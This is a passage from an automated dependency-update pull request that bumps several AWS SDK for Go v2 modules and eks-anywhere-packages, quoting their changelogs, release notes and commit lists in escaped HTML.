href=\"https://github.com/aws/aws-sdk-go-v2/commit/2223642aeafb3b46ae924667ee47d31a1cf5a9d5\"\u003e\u003ccode\u003e2223642\u003c/code\u003e\u003c/a\u003e Release 2026-04-29\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/04c7e460121eafa42577be08289bd0da0de091b2\"\u003e\u003ccode\u003e04c7e46\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/5f5692571a7afce76e1573da3fbf2180a2c297cc\"\u003e\u003ccode\u003e5f56925\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/aac6d2b8fefd47203d3b4bd5f229ca275272ec62\"\u003e\u003ccode\u003eaac6d2b\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/bdaead7d2074e479fc56da77491fe65737413664\"\u003e\u003ccode\u003ebdaead7\u003c/code\u003e\u003c/a\u003e upgrade to smithy-go v1.25.1 (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3399\"\u003e#3399\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/008e12cf64f41c37faeb705f6ce4b77471756f9f\"\u003e\u003ccode\u003e008e12c\u003c/code\u003e\u003c/a\u003e Release 2026-04-27\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/ef109d91f0b772aaebc472633edf13ec0fd907ce\"\u003e\u003ccode\u003eef109d9\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/6411e6379e509956413b866481ee2362a7cdfc68\"\u003e\u003ccode\u003e6411e63\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e5bf970956db306bf7b5b1bdd8ca71e8cca766b5\"\u003e\u003ccode\u003ee5bf970\u003c/code\u003e\u003c/a\u003e Release 2026-04-24\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/bdbb88c9400c80ed2487f7b498a54c6206b5c62a\"\u003e\u003ccode\u003ebdbb88c\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/v1.17.7...credentials/v1.19.16\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/feature/ec2/imds` from 1.15.3 to 1.18.23\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/CHANGELOG.md\"\u003egithub.com/aws/aws-sdk-go-v2/feature/ec2/imds's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease (2023-05-04)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/cloudwatch\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/cloudwatch/CHANGELOG.md#v1260-2023-05-04\"\u003ev1.26.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Adds support for filtering by metric names in CloudWatch Metric Streams.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/configservice\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/configservice/CHANGELOG.md#v1320-2023-05-04\"\u003ev1.32.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Updated ResourceType enum with new resource types onboarded by AWS Config in April 2023.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/connect\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/connect/CHANGELOG.md#v1541-2023-05-04\"\u003ev1.54.1\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDocumentation\u003c/strong\u003e: Remove unused InvalidParameterException from CreateParticipant API\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/ecs\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/ecs/CHANGELOG.md#v1270-2023-05-04\"\u003ev1.27.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Documentation update for new error type NamespaceNotFoundException for CreateCluster and UpdateCluster\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/networkfirewall\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/networkfirewall/CHANGELOG.md#v1280-2023-05-04\"\u003ev1.28.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: This release adds support for the Suricata REJECT option in midstream exception configurations.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/opensearch\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/opensearch/CHANGELOG.md#v1170-2023-05-04\"\u003ev1.17.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: DescribeDomainNodes: A new API that provides configuration information for nodes part of the domain\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/quicksight\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/quicksight/CHANGELOG.md#v1350-2023-05-04\"\u003ev1.35.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Add support for Topic, Dataset parameters and VPC\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/rekognition\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/rekognition/CHANGELOG.md#v1270-2023-05-04\"\u003ev1.27.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: This release adds a new attribute FaceOccluded. Additionally, you can now select attributes individually (e.g. [\u0026quot;DEFAULT\u0026quot;, \u0026quot;FACE_OCCLUDED\u0026quot;, \u0026quot;AGE_RANGE\u0026quot;] instead of [\u0026quot;ALL\u0026quot;]), which can reduce response time.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/s3\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/s3/CHANGELOG.md#v1331-2023-05-04\"\u003ev1.33.1\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDocumentation\u003c/strong\u003e: Documentation updates for Amazon S3\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/sagemaker\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/sagemaker/CHANGELOG.md#v1770-2023-05-04\"\u003ev1.77.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: We added support for ml.inf2 and ml.trn1 family of instances on Amazon SageMaker for deploying machine learning (ML) models for Real-time and Asynchronous inference. You can use these instances to achieve high performance at a low cost for generative artificial intelligence (AI) models.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/securityhub\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/securityhub/CHANGELOG.md#v1310-2023-05-04\"\u003ev1.31.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Add support for Finding History.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/sqs\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/sqs/CHANGELOG.md#v1210-2023-05-04\"\u003ev1.21.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: This release enables customers to call SQS using AWS JSON-1.0 protocol.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2023-05-03)\u003c/h1\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/appsync\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/appsync/CHANGELOG.md#v1200-2023-05-03\"\u003ev1.20.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Private API support for AWS AppSync. With Private APIs, you can now create GraphQL APIs that can only be accessed from your Amazon Virtual Private Cloud (\u0026quot;VPC\u0026quot;).\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/ec2\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/ec2/CHANGELOG.md#v1960-2023-05-03\"\u003ev1.96.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Adds an SDK paginator for GetNetworkInsightsAccessScopeAnalysisFindings\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/inspector2\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/inspector2/CHANGELOG.md#v1120-2023-05-03\"\u003ev1.12.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: This feature provides deep inspection for linux based instance\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/iottwinmaker\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/iottwinmaker/CHANGELOG.md#v1120-2023-05-03\"\u003ev1.12.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: This release adds a field for GetScene API to return error code and message from dependency services.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/networkfirewall\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/networkfirewall/CHANGELOG.md#v1270-2023-05-03\"\u003ev1.27.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: AWS Network Firewall now supports policy level HOME_NET variable overrides.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/opensearch\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/opensearch/CHANGELOG.md#v1160-2023-05-03\"\u003ev1.16.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Amazon OpenSearch Service adds the option to deploy a domain across multiple Availability Zones, with each AZ containing a complete copy of data and with nodes in one AZ acting as a standby. This option provides 99.99% availability and consistent performance in the event of infrastructure failure.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/wellarchitected\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/wellarchitected/CHANGELOG.md#v1200-2023-05-03\"\u003ev1.20.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: This release deepens integration with AWS Service Catalog AppRegistry to improve workload resource discovery.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2023-05-02)\u003c/h1\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/ae835ecd4db83e5aff241520ec643afba522d704\"\u003e\u003ccode\u003eae835ec\u003c/code\u003e\u003c/a\u003e Release 2023-05-04\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/ef7f367760339dbf8f4bb7c81dbb86b1561b3a9e\"\u003e\u003ccode\u003eef7f367\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/a62e494fe82709dd82ae4ce6d5a5a6a45287c45a\"\u003e\u003ccode\u003ea62e494\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/833592fbe1a37f1cfd8b7b7062473c7cc6a97859\"\u003e\u003ccode\u003e833592f\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/829131feddac6a2fa54ea0050ed7d8c97a29cdd7\"\u003e\u003ccode\u003e829131f\u003c/code\u003e\u003c/a\u003e Add SQSCustomizations (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/2108\"\u003e#2108\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/9d08e7dc2f051ac9c83deca2c548c1d4c3373cdb\"\u003e\u003ccode\u003e9d08e7d\u003c/code\u003e\u003c/a\u003e Release 2023-05-03\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/cec4d55d05fbd0bddff916f426901097073068a6\"\u003e\u003ccode\u003ecec4d55\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/f558c81e77f42988da4fe0d0aee4be0294a50a8b\"\u003e\u003ccode\u003ef558c81\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/8d2e554da1d221c2c1a541a78c729a3f564e8849\"\u003e\u003ccode\u003e8d2e554\u003c/code\u003e\u003c/a\u003e Release 2023-05-02\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/312e442dc8e12c6cb311e8ac5fcb5560eb4bcee1\"\u003e\u003ccode\u003e312e442\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/config/v1.15.3...config/v1.18.23\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/ec2` from 1.167.1 to 1.303.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2517fe9ffa52ed4507b13ccc57efa111b2008750\"\u003e\u003ccode\u003e2517fe9\u003c/code\u003e\u003c/a\u003e Release 2026-05-18\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/b92fcb4c3e3866495ce858576e58e7311c65f417\"\u003e\u003ccode\u003eb92fcb4\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/c7819484a7bc74c93cc3ec25742a1a99c1f07699\"\u003e\u003ccode\u003ec781948\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/49cfec4f4e0ab068413618037a391141530604c0\"\u003e\u003ccode\u003e49cfec4\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/71f1511b45ced10d1e68f9e631dcb37019759e34\"\u003e\u003ccode\u003e71f1511\u003c/code\u003e\u003c/a\u003e Support SHA-256 on CloudFront signing (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3406\"\u003e#3406\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/f29464eb7d59e0f436636245835fcc40a26908c9\"\u003e\u003ccode\u003ef29464e\u003c/code\u003e\u003c/a\u003e Release 2026-05-15\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/68ef1d689b9862ca77c2b52bf71d856a61822249\"\u003e\u003ccode\u003e68ef1d6\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/23c837914b0428505996a9c82f9a95afe4755f1d\"\u003e\u003ccode\u003e23c8379\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/d417d923addeb7f3b9f17a1105535b37964c1e68\"\u003e\u003ccode\u003ed417d92\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/d3db2d08ce74fa0da7d6adf8897272f43b25246d\"\u003e\u003ccode\u003ed3db2d0\u003c/code\u003e\u003c/a\u003e Auto-discover protocoltest instead of manually adding them to build (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3392\"\u003e#3392\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/service/ec2/v1.167.1...service/ec2/v1.303.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/ecr` from 1.27.4 to 1.57.2\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/9bd153c05150d0c3f9d45f5b9353c34df9bab5b5\"\u003e\u003ccode\u003e9bd153c\u003c/code\u003e\u003c/a\u003e Release 2025-03-04.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/b967446708e597c3c22c658d8399d11accc9e1f1\"\u003e\u003ccode\u003eb967446\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/188c52a1f53d95e7f99ce0edc73059ce5d0b803c\"\u003e\u003ccode\u003e188c52a\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/defaf5c13afed6bb77e2ee4fafea2bfcd09cea88\"\u003e\u003ccode\u003edefaf5c\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/8f2dd23c2630bd2ee667a403cf8ea8611c5ce406\"\u003e\u003ccode\u003e8f2dd23\u003c/code\u003e\u003c/a\u003e add test that verifies SRA order of operations (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3025\"\u003e#3025\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/3d547b010751de5a834a749ffdaddff4bcb0d39c\"\u003e\u003ccode\u003e3d547b0\u003c/code\u003e\u003c/a\u003e Release 2025-03-04\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/554a1497dc16d385e62514b10bc8adacfbd6a8d0\"\u003e\u003ccode\u003e554a149\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/3abb221732b42d61c95f5306f528cc2182d37c7a\"\u003e\u003ccode\u003e3abb221\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/95ae39d57f8d986f691754737311102335039848\"\u003e\u003ccode\u003e95ae39d\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/c62ec38df6cc8e66ecf014365d8bd15c2599bc6d\"\u003e\u003ccode\u003ec62ec38\u003c/code\u003e\u003c/a\u003e create kitchen sink test service (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3023\"\u003e#3023\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/config/v1.27.4...service/ssm/v1.57.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/eks-anywhere-packages` from 0.4.5 to 0.4.15\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/eks-anywhere-packages/releases\"\u003egithub.com/aws/eks-anywhere-packages's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.14.0\u003c/h2\u003e\n\u003ch2\u003eController\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd registry mirror support for curated packages\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eCLI\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eNew Command: \u003ccode\u003eeksctl anywhere copy packages\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere/pull/4420\"\u003eaws/eks-anywhere#4420\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.13.0\u003c/h2\u003e\n\u003ch2\u003eController\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd support for Create Namespace during package creation.\u003c/li\u003e\n\u003cli\u003eAdded Harbor support for import/download images command to EKS-A Packages.\u003c/li\u003e\n\u003cli\u003eFixed bug where PackageBundle version was incremented without changes sometimes.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ePackages\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded Prometheus Package\u003c/li\u003e\n\u003cli\u003eAdded New Helm Chart CRD Package for Emissary for improved upgrade flow, and support multiple instances of the package.\u003c/li\u003e\n\u003cli\u003eUpdated Emissary Package to version 3.3.0\u003c/li\u003e\n\u003cli\u003eUpdated Metallb Package to version to 0.13.7\nUpdated ADOT Package to version 0.23.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.12.0\u003c/h2\u003e\n\u003ch2\u003eGeneral\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMoved to Go version 1.18\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eController\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd EKS Anywhere Packages support for remote management on workload clusters.\u003c/li\u003e\n\u003cli\u003eFixed Update Available not showing on PackageBundle list.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ePackages\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded New Helm Chart CRD Package for Metallb for improved upgrade flow\u003c/li\u003e\n\u003cli\u003eAdded Cert Manager Package\u003c/li\u003e\n\u003cli\u003eAdded AWS Distro for OpenTelemetry Package (ADOT)\u003c/li\u003e\n\u003cli\u003eAdded Metrics Server Package\u003c/li\u003e\n\u003cli\u003eAdded Cluster Autoscaler Package\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.11.0\u003c/h2\u003e\n\u003ch2\u003eController\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded webhook to provide schema validation for packages\u003c/li\u003e\n\u003cli\u003eAdded support for gated packages\u003c/li\u003e\n\u003cli\u003eAdded active bundle validation for packagebundles\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eCLI\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSupport for configurations from \u003ccode\u003egenerate packages\u003c/code\u003e has been removed\u003c/li\u003e\n\u003cli\u003eSupport for gated packages\u003c/li\u003e\n\u003cli\u003eRemoved feature flag from curated packages installation\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ePackages\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded Emmisary package\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.10.0\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eController\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for configurations, and images in PackageBundle.\u003c/li\u003e\n\u003cli\u003eRemove registry from PackageBundle and updates sourceRegistry during cluster creation.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/afbcc9b196cf4d5988ddfb8f0133a2c1821821eb\"\u003e\u003ccode\u003eafbcc9b\u003c/code\u003e\u003c/a\u003e Faster retries during initial ecr credential injection (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1262\"\u003e#1262\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/01d4d5aff3e12dd6cc645cdb4126b8f2f5b8233c\"\u003e\u003ccode\u003e01d4d5a\u003c/code\u003e\u003c/a\u003e skip validation for package controller package (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1261\"\u003e#1261\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/317ca7eac8e949690a10dc6e8ec9e3b24f6a4a67\"\u003e\u003ccode\u003e317ca7e\u003c/code\u003e\u003c/a\u003e Revert pkg-ctlr cert private key rotation policy to Never (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1260\"\u003e#1260\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca 